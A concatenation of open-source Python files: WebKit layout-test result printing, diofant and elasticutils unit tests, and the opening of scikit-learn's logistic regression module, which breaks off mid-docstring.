else:
self._print_default("Running %d %ss in parallel." % (num_workers, driver_name))
self._print_debug("(%d shards; %d locked)." % (num_shards, num_locked_shards))
self._print_default('')
def _print_expected_results_of_type(self, run_results, result_type, result_type_str, tests_with_result_type_callback):
tests = tests_with_result_type_callback(result_type)
now = run_results.tests_by_timeline[test_expectations.NOW]
wontfix = run_results.tests_by_timeline[test_expectations.WONTFIX]
# We use a fancy format string in order to print the data out in a
# nicely-aligned table.
fmtstr = ("Expect: %%5d %%-8s (%%%dd now, %%%dd wontfix)"
% (self._num_digits(now), self._num_digits(wontfix)))
self._print_debug(fmtstr % (len(tests), result_type_str, len(tests & now), len(tests & wontfix)))
def _num_digits(self, num):
ndigits = 1
if len(num):
ndigits = int(math.log10(len(num))) + 1
return ndigits
def print_results(self, run_time, run_results, summarized_results):
self._print_timing_statistics(run_time, run_results)
self._print_one_line_summary(run_time, run_results)
def _print_timing_statistics(self, total_time, run_results):
self._print_debug("Test timing:")
self._print_debug(" %6.2f total testing time" % total_time)
self._print_debug("")
self._print_worker_statistics(run_results, int(self._options.child_processes))
self._print_aggregate_test_statistics(run_results)
self._print_individual_test_times(run_results)
self._print_directory_timings(run_results)
def _print_worker_statistics(self, run_results, num_workers):
self._print_debug("Thread timing:")
stats = {}
cuml_time = 0
for result in run_results.results_by_name.values():
stats.setdefault(result.worker_name, {'num_tests': 0, 'total_time': 0})
stats[result.worker_name]['num_tests'] += 1
stats[result.worker_name]['total_time'] += result.total_run_time
cuml_time += result.total_run_time
for worker_name in stats:
self._print_debug(" %10s: %5d tests, %6.2f secs" % (worker_name, stats[worker_name]['num_tests'], stats[worker_name]['total_time']))
self._print_debug(" %6.2f cumulative, %6.2f optimal" % (cuml_time, cuml_time / num_workers))
self._print_debug("")
def _print_aggregate_test_statistics(self, run_results):
times_for_dump_render_tree = [result.test_run_time for result in run_results.results_by_name.values()]
self._print_statistics_for_test_timings("PER TEST TIME IN TESTSHELL (seconds):", times_for_dump_render_tree)
def _print_individual_test_times(self, run_results):
# Reverse-sort by the time spent in the driver.
individual_test_timings = sorted(run_results.results_by_name.values(), key=lambda result: result.test_run_time, reverse=True)
num_printed = 0
slow_tests = []
timeout_or_crash_tests = []
unexpected_slow_tests = []
for test_tuple in individual_test_timings:
test_name = test_tuple.test_name
is_timeout_crash_or_slow = False
if test_name in run_results.slow_tests:
is_timeout_crash_or_slow = True
slow_tests.append(test_tuple)
if test_name in run_results.failures_by_name:
result = run_results.results_by_name[test_name].type
if (result == test_expectations.TIMEOUT or
result == test_expectations.CRASH):
is_timeout_crash_or_slow = True
timeout_or_crash_tests.append(test_tuple)
if (not is_timeout_crash_or_slow and num_printed < NUM_SLOW_TESTS_TO_LOG):
num_printed = num_printed + 1
unexpected_slow_tests.append(test_tuple)
self._print_debug("")
if unexpected_slow_tests:
self._print_test_list_timing("%s slowest tests that are not marked as SLOW and did not timeout/crash:" %
NUM_SLOW_TESTS_TO_LOG, unexpected_slow_tests)
self._print_debug("")
if slow_tests:
self._print_test_list_timing("Tests marked as SLOW:", slow_tests)
self._print_debug("")
if timeout_or_crash_tests:
self._print_test_list_timing("Tests that timed out or crashed:", timeout_or_crash_tests)
self._print_debug("")
def _print_test_list_timing(self, title, test_list):
self._print_debug(title)
for test_tuple in test_list:
test_run_time = round(test_tuple.test_run_time, 1)
self._print_debug(" %s took %s seconds" % (test_tuple.test_name, test_run_time))
def _print_directory_timings(self, run_results):
stats = {}
for result in run_results.results_by_name.values():
stats.setdefault(result.shard_name, {'num_tests': 0, 'total_time': 0})
stats[result.shard_name]['num_tests'] += 1
stats[result.shard_name]['total_time'] += result.total_run_time
min_seconds_to_print = 15
timings = []
for directory in stats:
rounded_time = round(stats[directory]['total_time'], 1)
if rounded_time > min_seconds_to_print:
timings.append((directory, rounded_time, stats[directory]['num_tests']))
if not timings:
return
timings.sort()
self._print_debug("Time to process slowest subdirectories:")
for timing in timings:
self._print_debug(" %s took %s seconds to run %s tests." % timing)
self._print_debug("")
def _print_statistics_for_test_timings(self, title, timings):
self._print_debug(title)
timings.sort()
num_tests = len(timings)
if not num_tests:
return
percentile90 = timings[int(.9 * num_tests)]
percentile99 = timings[int(.99 * num_tests)]
if num_tests % 2 == 1:
median = timings[((num_tests - 1) / 2) - 1]
else:
lower = timings[num_tests / 2 - 1]
upper = timings[num_tests / 2]
median = (float(lower + upper)) / 2
mean = sum(timings) / num_tests
for timing in timings:
sum_of_deviations = math.pow(timing - mean, 2)
std_deviation = math.sqrt(sum_of_deviations / num_tests)
self._print_debug(" Median: %6.3f" % median)
self._print_debug(" Mean: %6.3f" % mean)
self._print_debug(" 90th percentile: %6.3f" % percentile90)
self._print_debug(" 99th percentile: %6.3f" % percentile99)
self._print_debug(" Standard dev: %6.3f" % std_deviation)
self._print_debug("")
def _print_one_line_summary(self, total_time, run_results):
if self._options.timing:
parallel_time = sum(result.total_run_time for result in run_results.results_by_name.values())
# There is serial overhead in layout_test_runner.run() that we can't easily account for when
# really running in parallel, but taking the min() ensures that in the worst case
# (if parallel time is less than run_time) we do account for it.
serial_time = total_time - min(run_results.run_time, parallel_time)
speedup = (parallel_time + serial_time) / total_time
timing_summary = ' in %.2fs (%.2fs in rwt, %.2gx)' % (total_time, serial_time, speedup)
else:
timing_summary = ''
total = run_results.total - run_results.expected_skips
expected = run_results.expected - run_results.expected_skips
unexpected = run_results.unexpected
incomplete = total - expected - unexpected
incomplete_str = ''
if incomplete:
self._print_default("")
incomplete_str = " (%d didn't run)" % incomplete
if self._options.verbose or self._options.debug_rwt_logging or unexpected:
self.writeln("")
expected_summary_str = ''
if run_results.expected_failures > 0:
expected_summary_str = " (%d passed, %d didn't)" % (expected - run_results.expected_failures, run_results.expected_failures)
summary = ''
if unexpected == 0:
if expected == total:
if expected > 1:
summary = "All %d tests ran as expected%s%s." % (expected, expected_summary_str, timing_summary)
else:
summary = "The test ran as expected%s%s." % (expected_summary_str, timing_summary)
else:
summary = "%s ran as expected%s%s%s." % (grammar.pluralize('test', expected), expected_summary_str, incomplete_str, timing_summary)
else:
summary = "%s ran as expected%s, %d didn't%s%s:" % (grammar.pluralize('test', expected), expected_summary_str, unexpected, incomplete_str, timing_summary)
self._print_quiet(summary)
self._print_quiet("")
def _test_status_line(self, test_name, suffix):
format_string = '[%d/%d] %s%s'
status_line = format_string % (self.num_completed, self.num_tests, test_name, suffix)
if len(status_line) > self._meter.number_of_columns():
overflow_columns = len(status_line) - self._meter.number_of_columns()
ellipsis = '...'
if len(test_name) < overflow_columns + len(ellipsis) + 2:
# We don't have enough space even if we elide, just show the test filename.
fs = self._port.host.filesystem
test_name = fs.split(test_name)[1]
else:
new_length = len(test_name) - overflow_columns - len(ellipsis)
prefix = int(new_length / 2)
test_name = test_name[:prefix] + ellipsis + test_name[-(new_length - prefix):]
return format_string % (self.num_completed, self.num_tests, test_name, suffix)
def print_started_test(self, test_name):
self._running_tests.append(test_name)
if len(self._running_tests) > 1:
suffix = ' (+%d)' % (len(self._running_tests) - 1)
else:
suffix = ''
if self._options.verbose:
write = self._meter.write_update
else:
write = self._meter.write_throttled_update
write(self._test_status_line(test_name, suffix))
def print_finished_test(self, result, expected, exp_str, got_str):
self.num_completed += 1
test_name = result.test_name
result_message = self._result_message(result.type, result.failures, expected,
self._options.timing, result.test_run_time)
if self._options.details:
self._print_test_trace(result, exp_str, got_str)
elif self._options.verbose or not expected:
self.writeln(self._test_status_line(test_name, result_message))
elif self.num_completed == self.num_tests:
self._meter.write_update('')
else:
if test_name == self._running_tests[0]:
self._completed_tests.insert(0, [test_name, result_message])
else:
self._completed_tests.append([test_name, result_message])
for test_name, result_message in self._completed_tests:
self._meter.write_throttled_update(self._test_status_line(test_name, result_message))
self._completed_tests = []
self._running_tests.remove(test_name)
def _result_message(self, result_type, failures, expected, timing, test_run_time):
exp_string = ' unexpectedly' if not expected else ''
timing_string = ' %.4fs' % test_run_time if timing else ''
if result_type == test_expectations.PASS:
return ' passed%s%s' % (exp_string, timing_string)
else:
return ' failed%s (%s)%s' % (exp_string, ', '.join(failure.message() for failure in failures), timing_string)
def _print_test_trace(self, result, exp_str, got_str):
test_name = result.test_name
self._print_default(self._test_status_line(test_name, ''))
base = self._port.lookup_virtual_test_base(test_name)
if base:
args = ' '.join(self._port.lookup_virtual_test_args(test_name))
self._print_default(' base: %s' % base)
self._print_default(' args: %s' % args)
references = self._port.reference_files(test_name)
if references:
for _, filename in references:
self._print_default(' ref: %s' % self._port.relative_test_filename(filename))
else:
for extension in ('.txt', '.png', '.wav'):
self._print_baseline(test_name, extension)
self._print_default(' exp: %s' % exp_str)
self._print_default(' got: %s' % got_str)
self._print_default(' took: %-.3f' % result.test_run_time)
self._print_default('')
def _print_baseline(self, test_name, extension):
baseline = self._port.expected_filename(test_name, extension)
if self._port._filesystem.exists(baseline):
relpath = self._port.relative_test_filename(baseline)
else:
relpath = '<none>'
self._print_default(' %s: %s' % (extension[1:], relpath))
def _print_quiet(self, msg):
self.writeln(msg)
def _print_default(self, msg):
if not self._options.quiet:
self.writeln(msg)
def _print_debug(self, msg):
if self._options.debug_rwt_logging:
self.writeln(msg)
def write_throttled_update(self, msg):
self._meter.write_throttled_update(msg)
def write_update(self, msg):
self._meter.write_update(msg)
def writeln(self, msg):
self._meter.writeln(msg)
def flush(self):
self._meter.flush()
| hgl888/crosswalk-android-extensions | build/idl-generator/third_party/WebKit/Tools/Scripts/webkitpy/layout_tests/views/printing.py | Python | bsd-3-clause | 20,171 |
import pytest
from diofant import Integer, SympifyError
from diofant.core.operations import AssocOp, LatticeOp
__all__ = ()
class MyMul(AssocOp):
identity = Integer(1)
def test_flatten():
assert MyMul(2, MyMul(4, 3)) == MyMul(2, 4, 3)
class Join(LatticeOp):
"""Simplest possible Lattice class."""
zero = Integer(0)
identity = Integer(1)
def test_lattice_simple():
assert Join(Join(2, 3), 4) == Join(2, Join(3, 4))
assert Join(2, 3) == Join(3, 2)
assert Join(0, 2) == 0
assert Join(1, 2) == 2
assert Join(2, 2) == 2
assert Join(Join(2, 3), 4) == Join(2, 3, 4)
assert Join() == 1
assert Join(4) == 4
assert Join(1, 4, 2, 3, 1, 3, 2) == Join(2, 3, 4)
def test_lattice_shortcircuit():
pytest.raises(SympifyError, lambda: Join(object))
assert Join(0, object) == 0
def test_lattice_print():
assert str(Join(5, 4, 3, 2)) == 'Join(2, 3, 4, 5)'
def test_lattice_make_args():
assert Join.make_args(0) == {0}
assert Join.make_args(1) == {1}
assert Join.make_args(Join(2, 3, 4)) == {Integer(2), Integer(3), Integer(4)}
| diofant/diofant | diofant/tests/core/test_operations.py | Python | bsd-3-clause | 1,106 |
from nose.tools import eq_
from elasticutils import MLT
from elasticutils.tests import ESTestCase
class MoreLikeThisTest(ESTestCase):
data = [
{'id': 1, 'foo': 'bar', 'tag': 'awesome'},
{'id': 2, 'foo': 'bar', 'tag': 'boring'},
{'id': 3, 'foo': 'bar', 'tag': 'awesome'},
{'id': 4, 'foo': 'bar', 'tag': 'boring'},
{'id': 5, 'foo': 'bar', 'tag': 'elite'},
{'id': 6, 'foo': 'notbar', 'tag': 'gross'},
{'id': 7, 'foo': 'notbar', 'tag': 'awesome'},
]
def test_bad_mlt(self):
"""Tests S or index and doc_type is specified."""
self.assertRaises(ValueError, lambda: MLT(1))
self.assertRaises(ValueError, lambda: MLT(1, index='foo'))
self.assertRaises(ValueError, lambda: MLT(1, doctype='foo'))
def test_mlt_on_foo(self):
"""Verify MLT with the foo field."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s(), ['foo'], min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 4)
def test_mlt_on_foo_no_s(self):
"""Verify MLT with the foo field."""
index = self.get_s().get_indexes()[0]
doc_type = self.get_s().get_doctypes()[0]
es = self.get_s().get_es()
mlt = MLT(1, mlt_fields=['foo'], index=index, doctype=doc_type,
es=es, min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 4)
def test_mlt_on_tag(self):
"""Verify MLT with the tag field."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s(), ['tag'], min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 2)
def test_mlt_on_two_fields(self):
"""Verify MLT on tag and foo fields."""
mlt = MLT(1, self.get_s(), ['tag', 'foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 5)
def test_mlt_deprecated_fields(self):
with self.assertRaises(DeprecationWarning):
MLT(1, self.get_s(), fields=['tag', 'foo'])
def test_mlt_iter(self):
mlt = MLT(1, self.get_s(), ['tag', 'foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(list(mlt)), 5)
def test_mlt_on_foo_with_filter(self):
"""Verify MLT with the foo field while filtering on tag."""
# We need to pass min_term_freq and min_doc_freq, because the terms
# we are using are only once in each document.
mlt = MLT(1, self.get_s().filter(tag='boring'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 2)
mlt = MLT(1, self.get_s().filter(tag='elite'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 1)
mlt = MLT(1, self.get_s().filter(tag='awesome'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 1)
mlt = MLT(1, self.get_s().filter(tag='gross'), ['foo'],
min_term_freq=1, min_doc_freq=1)
eq_(len(mlt), 0)
| mozilla/elasticutils | elasticutils/tests/test_mlt.py | Python | bsd-3-clause | 3,116 |
"""
Logistic Regression
"""
# Author: Gael Varoquaux <[email protected]>
# Fabian Pedregosa <[email protected]>
# Alexandre Gramfort <[email protected]>
# Manoj Kumar <[email protected]>
import numbers
import warnings
import numpy as np
from scipy import optimize, sparse
from .base import LinearClassifierMixin, SparseCoefMixin, BaseEstimator
from ..feature_selection.from_model import _LearntSelectorMixin
from ..preprocessing import LabelEncoder
from ..svm.base import BaseLibLinear
from ..utils import check_array, check_consistent_length, compute_class_weight
from ..utils.extmath import log_logistic, safe_sparse_dot
from ..utils.optimize import newton_cg
from ..utils.validation import as_float_array, DataConversionWarning
from ..utils.fixes import expit
from ..externals.joblib import Parallel, delayed
from ..cross_validation import _check_cv
from ..externals import six
from ..metrics import SCORERS
# .. some helper functions for logistic_regression_path ..
def _intercept_dot(w, X, y):
"""Computes y * np.dot(X, w).
It takes into consideration if the intercept should be fit or not.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
"""
c = 0.
if w.size == X.shape[1] + 1:
c = w[-1]
w = w[:-1]
z = safe_sparse_dot(X, w) + c
return w, c, y * z
def _logistic_loss_and_grad(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss and gradient.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
grad : ndarray, shape (n_features,) or (n_features + 1,)
Logistic gradient.
"""
_, n_features = X.shape
grad = np.empty_like(w)
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
z = expit(yz)
z0 = sample_weight * (z - 1) * y
grad[:n_features] = safe_sparse_dot(X.T, z0) + alpha * w
# Case where we fit the intercept.
if grad.shape[0] > n_features:
grad[-1] = z0.sum()
return out, grad
def _logistic_loss(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
"""
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
return out
def _logistic_loss_grad_hess(w, X, y, alpha, sample_weight=None):
"""Computes the logistic loss, gradient and the Hessian.
Parameters
----------
w : ndarray, shape (n_features,) or (n_features + 1,)
Coefficient vector.
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : ndarray, shape (n_samples,)
Array of labels.
alpha : float
Regularization parameter. alpha is equal to 1 / C.
sample_weight : ndarray, shape (n_samples,) optional
Array of weights that are assigned to individual samples.
If not provided, then each sample is given unit weight.
Returns
-------
out : float
Logistic loss.
grad : ndarray, shape (n_features,) or (n_features + 1,)
Logistic gradient.
Hs : callable
Function that takes the gradient as a parameter and returns the
matrix product of the Hessian and gradient.
"""
n_samples, n_features = X.shape
grad = np.empty_like(w)
fit_intercept = grad.shape[0] > n_features
w, c, yz = _intercept_dot(w, X, y)
if sample_weight is None:
sample_weight = np.ones(y.shape[0])
# Logistic loss is the negative of the log of the logistic function.
out = -np.sum(sample_weight * log_logistic(yz)) + .5 * alpha * np.dot(w, w)
z = expit(yz)
z0 = sample_weight * (z - 1) * y
grad[:n_features] = safe_sparse_dot(X.T, z0) + alpha * w
# Case where we fit the intercept.
if fit_intercept:
grad[-1] = z0.sum()
# The mat-vec product of the Hessian
d = sample_weight * z * (1 - z)
if sparse.issparse(X):
dX = safe_sparse_dot(sparse.dia_matrix((d, 0),
shape=(n_samples, n_samples)), X)
else:
# Precompute as much as possible
dX = d[:, np.newaxis] * X
if fit_intercept:
# Calculate the double derivative with respect to intercept
# In the case of sparse matrices this returns a matrix object.
dd_intercept = np.squeeze(np.array(dX.sum(axis=0)))
def Hs(s):
ret = np.empty_like(s)
ret[:n_features] = X.T.dot(dX.dot(s[:n_features]))
ret[:n_features] += alpha * s[:n_features]
# For the fit intercept case.
if fit_intercept:
ret[:n_features] += s[-1] * dd_intercept
ret[-1] = dd_intercept.dot(s[:n_features])
ret[-1] += d.sum() * s[-1]
return ret
return out, grad, Hs
def logistic_regression_path(X, y, pos_class=None, Cs=10, fit_intercept=True,
max_iter=100, tol=1e-4, verbose=0,
solver='lbfgs', coef=None, copy=True,
class_weight=None, dual=False, penalty='l2',
intercept_scaling=1.):
"""Compute a Logistic Regression model for a list of regularization
parameters.
This is an implementation that uses the result of the previous model
to speed up computations along the set of solutions, making it faster
than sequentially calling LogisticRegression for the different parameters.
Parameters
----------
X : array-like or sparse matrix, shape (n_samples, n_features)
Input data.
y : array-like, shape (n_samples,)
Input data, target values.
Cs : int | array-like, shape (n_cs,)
List of values for the regularization parameter or integer specifying
the number of regularization parameters that should be used. In this
case, the parameters will be chosen in a logarithmic scale between
1e-4 and 1e4.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
fit_intercept : bool
Whether to fit an intercept for the model. In this case the shape of
the returned array is (n_cs, n_features + 1).
max_iter : int
Maximum number of iterations for the solver.
tol : float
Stopping criterion. For the newton-cg and lbfgs solvers, the iteration
will stop when ``max{|g_i | i = 1, ..., n} <= tol``
where ``g_i`` is the i-th component of the gradient.
verbose : int
Print convergence message if True.
solver : {'lbfgs', 'newton-cg', 'liblinear'}
Numerical solver to use.
coef : array-like, shape (n_features,), default None
Initialization value for coefficients of logistic regression.
copy : bool, default True
Whether or not to produce a copy of the data. Setting this to
True will be useful in cases, when logistic_regression_path
is called repeatedly with the same data, as y is modified
along the path.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept.
Cs : ndarray
Grid of Cs used for cross-validation.
Notes
-----
You might get slighly different results with the solver liblinear than
with the others since this uses LIBLINEAR which penalizes the intercept.
"""
if isinstance(Cs, numbers.Integral):
Cs = np.logspace(-4, 4, Cs)
X = check_array(X, accept_sparse='csc', dtype=np.float64)
y = check_array(y, ensure_2d=False, copy=copy)
check_consistent_length(X, y)
n_classes = np.unique(y)
if pos_class is None:
if (n_classes.size > 2):
raise ValueError('To fit OvA, use the pos_class argument')
# np.unique(y) gives labels in sorted order.
pos_class = n_classes[1]
# If class_weights is a dict (provided by the user), the weights
# are assigned to the original labels. If it is "auto", then
# the class_weights are assigned after masking the labels with a OvA.
sample_weight = np.ones(X.shape[0])
le = LabelEncoder()
if isinstance(class_weight, dict):
if solver == "liblinear":
if n_classes.size == 2:
# Reconstruct the weights with keys 1 and -1
temp = {}
temp[1] = class_weight[pos_class]
temp[-1] = class_weight[n_classes[0]]
class_weight = temp.copy()
else:
raise ValueError("In LogisticRegressionCV the liblinear "
"solver cannot handle multiclass with "
"class_weight of type dict. Use the lbfgs, "
"newton-cg solvers or set "
"class_weight='auto'")
else:
class_weight_ = compute_class_weight(class_weight, n_classes, y)
sample_weight = class_weight_[le.fit_transform(y)]
mask = (y == pos_class)
y[mask] = 1
y[~mask] = -1
# To take care of object dtypes
y = as_float_array(y, copy=False)
if class_weight == "auto":
class_weight_ = compute_class_weight(class_weight, [-1, 1], y)
sample_weight = class_weight_[le.fit_transform(y)]
if fit_intercept:
w0 = np.zeros(X.shape[1] + 1)
else:
w0 = np.zeros(X.shape[1])
if coef is not None:
# it must work both giving the bias term and not
if not coef.size in (X.shape[1], w0.size):
raise ValueError('Initialization coef is not of correct shape')
w0[:coef.size] = coef
coefs = list()
for C in Cs:
if solver == 'lbfgs':
func = _logistic_loss_and_grad
try:
out = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=(X, y, 1. / C, sample_weight),
iprint=(verbose > 0) - 1, pgtol=tol, maxiter=max_iter)
except TypeError:
# old scipy doesn't have maxiter
out = optimize.fmin_l_bfgs_b(
func, w0, fprime=None,
args=(X, y, 1. / C, sample_weight),
iprint=(verbose > 0) - 1, pgtol=tol)
w0 = out[0]
if out[2]["warnflag"] == 1:
warnings.warn("lbfgs failed to converge. Increase the number "
"of iterations.")
elif solver == 'newton-cg':
grad = lambda x, *args: _logistic_loss_and_grad(x, *args)[1]
w0 = newton_cg(_logistic_loss_grad_hess, _logistic_loss, grad, w0,
args=(X, y, 1. / C, sample_weight),
maxiter=max_iter, tol=tol)
elif solver == 'liblinear':
lr = LogisticRegression(C=C, fit_intercept=fit_intercept, tol=tol,
class_weight=class_weight, dual=dual,
penalty=penalty,
intercept_scaling=intercept_scaling)
lr.fit(X, y)
if fit_intercept:
w0 = np.concatenate([lr.coef_.ravel(), lr.intercept_])
else:
w0 = lr.coef_.ravel()
else:
raise ValueError("solver must be one of {'liblinear', 'lbfgs', "
"'newton-cg'}, got '%s' instead" % solver)
coefs.append(w0)
return coefs, np.array(Cs)
# helper function for LogisticCV
def _log_reg_scoring_path(X, y, train, test, pos_class=None, Cs=10,
scoring=None, fit_intercept=False,
max_iter=100, tol=1e-4, class_weight=None,
verbose=0, solver='lbfgs', penalty='l2',
dual=False, copy=True, intercept_scaling=1.):
"""Computes scores across logistic_regression_path
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
Training data.
y : array-like, shape (n_samples,) or (n_samples, n_targets)
Target labels.
train : list of indices
The indices of the train set.
test : list of indices
The indices of the test set.
pos_class : int, None
The class with respect to which we perform a one-vs-all fit.
If None, then it is assumed that the given problem is binary.
Cs : list of floats | int
Each of the values in Cs describes the inverse of
regularization strength. If Cs is as an int, then a grid of Cs
values are chosen in a logarithmic scale between 1e-4 and 1e4.
If not provided, then a fixed set of values for Cs are used.
scoring : callable
For a list of scoring functions that can be used, look at
:mod:`sklearn.metrics`. The default scoring option used is
accuracy_score.
fit_intercept : bool
If False, then the bias term is set to zero. Else the last
term of each coef_ gives us the intercept.
max_iter : int
Maximum number of iterations for the solver.
tol : float
Tolerance for stopping criteria.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
verbose : int
Amount of verbosity.
solver : {'lbfgs', 'newton-cg', 'liblinear'}
Decides which solver to use.
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
intercept_scaling : float, default 1.
This parameter is useful only when the solver 'liblinear' is used
and self.fit_intercept is set to True. In this case, x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
Returns
-------
coefs : ndarray, shape (n_cs, n_features) or (n_cs, n_features + 1)
List of coefficients for the Logistic Regression model. If
fit_intercept is set to True then the second dimension will be
n_features + 1, where the last item represents the intercept.
Cs : ndarray
Grid of Cs used for cross-validation.
scores : ndarray, shape (n_cs,)
Scores obtained for each Cs.
"""
log_reg = LogisticRegression(fit_intercept=fit_intercept)
log_reg._enc = LabelEncoder()
log_reg._enc.fit_transform([-1, 1])
X_train = X[train]
X_test = X[test]
y_train = y[train]
y_test = y[test]
if pos_class is not None:
mask = (y_test == pos_class)
y_test[mask] = 1
y_test[~mask] = -1
# To deal with object dtypes, we need to convert into an array of floats.
y_test = as_float_array(y_test, copy=False)
coefs, Cs = logistic_regression_path(X_train, y_train, Cs=Cs,
fit_intercept=fit_intercept,
solver=solver,
max_iter=max_iter,
class_weight=class_weight,
copy=copy, pos_class=pos_class,
tol=tol, verbose=verbose,
dual=dual, penalty=penalty,
intercept_scaling=intercept_scaling)
scores = list()
if isinstance(scoring, six.string_types):
scoring = SCORERS[scoring]
for w in coefs:
if fit_intercept:
log_reg.coef_ = w[np.newaxis, :-1]
log_reg.intercept_ = w[-1]
else:
log_reg.coef_ = w[np.newaxis, :]
log_reg.intercept_ = 0.
if scoring is None:
scores.append(log_reg.score(X_test, y_test))
else:
scores.append(scoring(log_reg, X_test, y_test))
return coefs, Cs, np.array(scores)
class LogisticRegression(BaseLibLinear, LinearClassifierMixin,
_LearntSelectorMixin, SparseCoefMixin):
"""Logistic Regression (aka logit, MaxEnt) classifier.
In the multiclass case, the training algorithm uses a one-vs.-all (OvA)
scheme, rather than the "true" multinomial LR.
This class implements regularized logistic regression using the
`liblinear` library, newton-cg and lbfgs solvers. It can handle both
dense and sparse input. Use C-ordered arrays or CSR matrices containing
64-bit floats for optimal performance; any other input format will be
converted (and copied).
The newton-cg and lbfgs solvers support only L2 regularization with primal
formulation. The liblinear solver supports both L1 and L2 regularization,
with a dual formulation only for the L2 penalty.
Parameters
----------
penalty : str, 'l1' or 'l2'
Used to specify the norm used in the penalization. The newton-cg and
lbfgs solvers support only l2 penalties.
dual : bool
Dual or primal formulation. Dual formulation is only implemented for
l2 penalty with liblinear solver. Prefer dual=False when
n_samples > n_features.
C : float, optional (default=1.0)
Inverse of regularization strength; must be a positive float.
Like in support vector machines, smaller values specify stronger
regularization.
fit_intercept : bool, default: True
Specifies if a constant (a.k.a. bias or intercept) should be
added the decision function.
intercept_scaling : float, default: 1
when self.fit_intercept is True, instance vector x becomes
[x, self.intercept_scaling],
i.e. a "synthetic" feature with constant value equals to
intercept_scaling is appended to the instance vector.
The intercept becomes intercept_scaling * synthetic feature weight
Note! the synthetic feature weight is subject to l1/l2 regularization
as all other features.
To lessen the effect of regularization on synthetic feature weight
(and therefore on the intercept) intercept_scaling has to be increased.
class_weight : {dict, 'auto'}, optional
Over-/undersamples the samples of each class according to the given
weights. If not given, all classes are supposed to have weight one.
The 'auto' mode selects weights inversely proportional to class
frequencies in the training set.
max_iter : int
Useful only for the newton-cg and lbfgs solvers. Maximum number of
iterations taken for the solvers to converge.
random_state : int seed, RandomState instance, or None (default)
The seed of the pseudo random number generator to use when
shuffling the data.
solver : {'newton-cg', 'lbfgs', 'liblinear'}
Algorithm to use in the optimization problem.
tol : float, optional
Tolerance for stopping criteria.
Attributes
----------
coef_ : array, shape (n_classes, n_features)
Coefficient of the features in the decision function.
intercept_ : array, shape (n_classes,)
Intercept (a.k.a. bias) added to the decision function.
If `fit_intercept` is set to False, the intercept is set to zero.
n_iter_ : int
Maximum of the actual number of iterations across all classes.
Valid only for the liblinear solver.
See also
--------
SGDClassifier : incrementally trained logistic regression (when given
